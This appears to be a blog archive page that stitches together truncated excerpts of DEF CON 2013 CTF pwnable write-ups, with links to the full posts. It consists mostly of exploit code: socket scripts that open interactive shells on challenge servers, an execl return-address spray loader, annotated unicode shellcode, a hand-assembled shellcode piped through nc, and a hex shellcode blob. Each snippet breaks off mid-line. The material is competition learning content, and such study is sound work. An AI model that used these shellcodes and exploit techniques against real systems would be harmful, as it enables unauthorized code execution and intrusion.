Category : Pwnables
Summary : signal handler, use-after-free, lift esp to argv

loader.c
#include
#define RET "\xbb\x8b\x04\x08"
#define RET16 RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET
#define EXECL "\x90\x42\x0e\x40"
#define BINARY "\x74\x81\x04\x08" // &"GNU"
char *args[] = {RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 ..
CTF
Category : Pwnables
Summary : 5byte command

Exploit
#!/usr/bin/python
from socket import *
HOST = "192.168.123.134"
PORT = 7879
cmd = ""
s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
s.send("sh&4\n")
while 1:
    cmd = raw_input("$ ")
    if cmd == "exit":
        break
    else:
        s.send(cmd+"\n")
        print s.recv(1024)
s.close()

root@ubuntu:~/givemeshell# ./exploit.py
$ id
uid=1005(givemeshell) gid=1005(givemeshell) grou..
pwnable (0x41414141)
- pwnable1 : http://pwn3r.tistory.com/entry/Defcon-CTF-2013-qual-pwnable1
- pwnable2 : (not yet)
- pwnable3 : http://pwn3r.tistory.com/entry/Defcon-CTF-2013-qual-pwnable3
- pwnable4 : (not yet)
- pwnable5 : (not yet)

shellcode (\xff\xe4\xcc)
- shellcode1 : (not yet)
- shellcode2 : http://pwn3r.tistory.com/entry/Defcon-CTF-2013-qual-shellcode2
- shellcode3 : http://pwn3r.tistory.com/..
Category : Pwnable (\xff\xe4\xcc)
Summary : unicode shellcode, overwrite below byte

Exploit
#!/usr/bin/python
from socket import *
from struct import pack
import time
HOST = "penser.shallweplayaga.me"
PORT = 8273
"""
51        # push %rcx
00 45 00  # align
59        # pop %rcx
00 45 00
52        # push %rdx
00 45 00
58        # pop %rax
00 45 00
32 00     # xor (%rax), %al
50        # push %rax
00 45 00
5a        # pop %rdx
00 45 00
59        # pop %rcx
00 45 00
59        # pop %rc..
Category : Pwnable (\xff\xe4\xcc)(empty)
Summary : short shellcoding, reuse pointer in ecx

/*
00A21E80  8B09           MOV ECX,DWORD PTR DS:[ECX]
00A21E82  8D41 05        LEA EAX,DWORD PTR DS:[ECX+5]
00A21E85  66:8138 4141   CMP WORD PTR DS:[EAX],4141
00A21E8A  ^75 F4         JNZ SHORT 00A21E80
00A21E8C  C3             RETN
*/
root@ubuntu:~# (python -c 'print "\x8b\x09\x8d\x41\x05\x66\x81\x38\x41\x41\x75\xf4\xc3"')| nc linked2.shallweplayaga.me ..
Category : Pwnable (\xff\xe4\xcc)
Summary : generate shellcode with game

Exploit
#!/usr/bin/env python
import socket
import time
import thread
import re
HOST = "blackjack.shallweplayaga.me"
PORT = 6789
SHELLCODE = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\x00\x00\x00\x00\x66\x68\x7a\x69\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80..
Category : Pwnables
Summary : signed integer, use-after-free, heap-spray, ASLR & DEP bypass

gen_answer_dict.py
import re
from socket import *
from struct import pack, unpack
HOST = "lolergab.shallweplayaga.me"
PORT = 5000

def SaveFile(data):
    f = open('dic.txt', 'r')
    if f.read().find(data) != -1:
        f.close()
        return
    f.close()
    f = open('dic.txt', 'at')
    f.write(data)
    f.close()

def Attack(s):
    data = s.recv(1024)
    l..
Category : Pwnables (0x41414141)
Summary : uninitialized variable, stack based buffer overflow, ROP on ARM linux

Exploit
#!/usr/bin/python
# recv(4, buf, len(cmd)) -> system(buf)
from socket import *
from struct import pack
import time, sys
p = lambda x: pack("